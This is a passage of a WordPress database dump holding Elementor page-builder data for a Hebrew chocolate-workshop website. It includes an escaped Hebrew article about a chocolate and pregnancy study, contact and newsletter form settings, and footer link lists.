\\u05e2\\u05d1\\u05e8\\u05d5 \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05d3\\u05d5\\u05e4\\u05e7 \\u05d1\\u05ea\\u05d7\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05d7\\u05e7\\u05e8, \\u05db\\u05de\\u05d5 \\u05d2\\u05dd \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05d6\\u05e8\\u05d9\\u05de\\u05ea \\u05d4\\u05d3\\u05dd \\u05d4\\u05e8\\u05d7\\u05de\\u05d9\\u05ea, \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05d4\\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05ea. \\u05d4\\u05e0\\u05ea\\u05d5\\u05e0\\u05d9\\u05dd \\u05e9\\u05d9\\u05de\\u05e9\\u05d5 \\u05db\\u05e1\\u05de\\u05df \\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05d9\\u05ea\\u05e8 \\u05dc\\u05d7\\u05e5 \\u05d3\\u05dd \\u05d5\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05e9\\u05dc\\u05d9\\u05dc\\u05d9\\u05d5\\u05ea \\u05d0\\u05e4\\u05e9\\u05e8\\u05d9\\u05d5\\u05ea \\u05d0\\u05d7\\u05e8\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d4\\u05d9\\u05e8\\u05d9\\u05d5\\u05df.<\\/p><p>\\u05d4\\u05d0\\u05de\\u05d4\\u05d5\\u05ea \\u05d4\\u05d4\\u05e8\\u05d5\\u05ea \\u05d7\\u05d5\\u05dc\\u05e7\\u05d5 \\u05d1\\u05d0\\u05e7\\u05e8\\u05d0\\u05d9 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05dc\\u05d5\\u05e9\\u05d9\\u05dd \\u05d2\\u05e8\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d3\\u05dc\\u05d9\\u05dc \\u05d1\\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd \\u05de\\u05d3\\u05d9 \\u05d9\\u05d5\\u05dd, \\u05d1\\u05de\\u05e9\\u05da \\u05e9\\u05dc\\u05d5\\u05e9\\u05d4 \\u05d7\\u05d5\\u05d3\\u05e9\\u05d9\\u05dd. \\u05d4\\u05dd \\u05e2\\u05d1\\u05e8\\u05d5 \\u05d1\\u05d3\\u05d9\\u05e7\\u05d5\\u05ea \\u05e2\\u05d5\\u05e8\\u05e7\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d5\\u05ea \\u05d1\\u05ea\\u05d5\\u05dd \\u05e9\\u05dc\\u05d5\\u05e9\\u05ea \\u05d4\\u05d7\\u05d5\\u05d3\\u05e9\\u05d9\\u05dd, \\u05d5\\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05de\\u05e2\\u05e7\\u05d1 \\u05e2\\u05d3 \\u05d4\\u05dc\\u05d9\\u05d3\\u05d4.<\\/p><h2><strong>\\u05d4\\u05de\\u05de\\u05e6\\u05d0\\u05d9\\u05dd: \\u05db\\u05dc \\u05ea\\u05db\\u05d5\\u05dc\\u05d4 \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05dc\\u05e2\\u05d5\\u05d1\\u05e8<\\/strong><\\/h2><p>\\u05d4\\u05d7\\u05d5\\u05e7\\u05e8\\u05d9\\u05dd \\u05d2\\u05d9\\u05dc\\u05d5 \\u05db\\u05d9 \\u05dc\\u05d0 \\u05e0\\u05de\\u05e6\\u05d0\\u05d5 \\u05d4\\u05d1\\u05d3\\u05dc\\u05d9\\u05dd \\u05de\\u05d1\\u05d7\\u05d9\\u05e0\\u05ea \\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05dc\\u05d7\\u05e5 \\u05d9\\u05ea\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e8\\u05d9\\u05d5\\u05df, \\u05de\\u05e9\\u05e7\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05de\\u05e9\\u05e7\\u05dc \\u05d4\\u05dc\\u05d9\\u05d3\\u05d4 \\u05d1\\u05d9\\u05df \\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d4\\u05e0\\u05e9\\u05d9\\u05dd \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05d4\\u05db\\u05d9\\u05dc\\u05d5 \\u05e8\\u05de\\u05d5\\u05ea \\u05e0\\u05de\\u05d5\\u05db\\u05ea \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd, \\u05dc\\u05d1\\u05d9\\u05df \\u05d4\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05e9\\u05e7\\u05d9\\u05d1\\u05dc\\u05d5 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd. \\u05e6\\u05d5\\u05d5\\u05ea \\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05de\\u05e6\\u05d9\\u05d9\\u05df \\u05e9\\u05ea\\u05d5\\u05e6\\u05d0\\u05d5\\u05ea \\u05d0\\u05dc\\u05d5 \\u05d4\\u05d9\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea \\u05de\\u05d4\\u05e6\\u05e4\\u05d5\\u05d9 \\u05d1\\u05e8\\u05d5\\u05d1 \\u05d4\\u05de\\u05e7\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05e8\\u05d1 \\u05d4\\u05d0\\u05d5\\u05db\\u05dc\\u05d5\\u05e1\\u05d9\\u05d9\\u05d4 \\u05d4\\u05db\\u05dc\\u05dc\\u05d9\\u05ea.<\\/p><p>\\u05dc\\u05d3\\u05d1\\u05e8\\u05d9\\u05d4\\u05dd, \\u05de\\u05d7\\u05e7\\u05e8 \\u05d6\\u05d4 \\u05de\\u05e6\\u05d1\\u05d9\\u05e2 \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05e4\\u05e2\\u05d4 \\u05d7\\u05d9\\u05d5\\u05d1\\u05d9\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d4 \\u05d5\\u05e2\\u05dc \\u05d4\\u05ea\\u05e4\\u05ea\\u05d7\\u05d5\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05e8 \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05d1\\u05de\\u05d9\\u05e9\\u05e8\\u05d9\\u05df, \\u05d0\\u05dc\\u05d0 \\u05d0\\u05e3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d9\\u05e9\\u05d9\\u05e8\\u05d4 \\u05e2\\u05e7\\u05d1 \\u05ea\\u05db\\u05d5\\u05dc\\u05ea \\u05d4\\u05e4\\u05dc\\u05d1\\u05e0\\u05d5\\u05d0\\u05d9\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u05d4\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05db\\u05d9 \\u05d4\\u05e6\\u05e2\\u05d3 \\u05d4\\u05d1\\u05d0 \\u05e9\\u05dc \\u05d4\\u05e6\\u05d5\\u05d5\\u05ea \\u05d4\\u05d5\\u05d0 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e0\\u05d9\\u05e1\\u05d5\\u05d9 \\u05d1\\u05d9\\u05e7\\u05d5\\u05e8\\u05ea \\u05d0\\u05e7\\u05e8\\u05d0\\u05d9 \\u05d2\\u05d3\\u05d5\\u05dc \\u05db\\u05d3\\u05d9 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e2 \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d4\\u05d0\\u05dd \\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e7\\u05e8\\u05d1 \\u05e0\\u05e9\\u05d9\\u05dd \\u05d4\\u05e8\\u05d5\\u05ea \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05e4\\u05d7\\u05d9\\u05ea \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05e8\\u05e2\\u05dc\\u05ea \\u05d4\\u05e8\\u05d9\\u05d5\\u05df \\u05d5\\u05d4\\u05e4\\u05e8\\u05e2\\u05d5\\u05ea \\u05d9\\u05ea\\u05e8 \\u05dc\\u05d7\\u05e5 \\u05d3\\u05dd \\u05d4\\u05e7\\u05e9\\u05d5\\u05e8\\u05d9\\u05dd \\u05dc\\u05d4\\u05e8\\u05d9\\u05d5\\u05df.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(754,160,'_elementor_version','0.4'),(755,160,'_elementor_conditions','a:1:{i:0;s:21:\"include/singular/post\";}'),(757,161,'_elementor_template_type','single'),(758,161,'_elementor_edit_mode','builder'),(759,161,'_wp_page_template','default'),(760,161,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(761,161,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0